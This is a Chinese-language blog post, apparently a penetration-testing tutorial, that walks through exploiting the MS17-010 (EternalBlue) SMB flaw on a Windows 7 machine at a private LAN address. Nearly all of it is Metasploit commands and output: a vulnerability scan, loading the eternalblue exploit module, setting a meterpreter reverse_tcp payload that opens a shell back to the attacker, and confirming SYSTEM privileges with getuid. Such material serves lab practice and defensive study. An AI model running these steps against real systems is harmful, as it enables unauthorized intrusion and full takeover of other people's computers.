MS17_010漏洞

448次阅读

共计 748 个字符,预计需要花费 2 分钟才能阅读完成。

信息收集

MS17_010 漏洞利用,通过扫描确认网络中 192.168.1.123 计算机 445 端口处于开启状态

MS17_010 漏洞

探测漏洞是否可用

进入 msf 交互控制台

msfconsole

搜索相关的攻击辅助模块以及攻击模块

search ms17

MS17_010 漏洞

加载扫描检测漏洞辅助模块

use auxiliary/scanner/smb/smb_ms17_010

MS17_010 漏洞
查看需要设置的参数,如下参数为 rhost(目标 IP)

MS17_010 漏洞
设置被检测目标机器 rhost 192.68.1.123

MS17_010 漏洞

run

返回

Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

译文:主机很可能容易受到 MS17-010 的!-Windows 7 终极 7601 服务包 1 ×64(64 位)

此时,确认该漏洞可用

开始攻击

选择攻击模块 use exploit/windows/smb/ms17_010_eternalblue

use exploit/windows/smb/ms17_010_eternalblue

MS17_010 漏洞
查看需要设置的参数,如下参数为 payload(攻击载荷),rhost(目标 IP)

show options

MS17_010 漏洞

设置参数攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

set payload windows/x64/meterpreter/reverse_tcp

MS17_010 漏洞 目标 IP:set rhosts 192.168.1.123

<pre class="wp-block-code">```
set rhosts 192.168.1.123

MS17_010 漏洞
开始攻击

exploit

当出现 =-=-=-WIN=-=-=- 就代表已成功拿到权限

MS17_010 漏洞

提升权限

getuid

MS17_010 漏洞

此刻已拿到该计算机的 system 权限

持续关注!!!

正文完
 1
Hack V
版权声明:本站原创文章,由 Hack V 于2022-12-11发表,共计748字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
请喝咖啡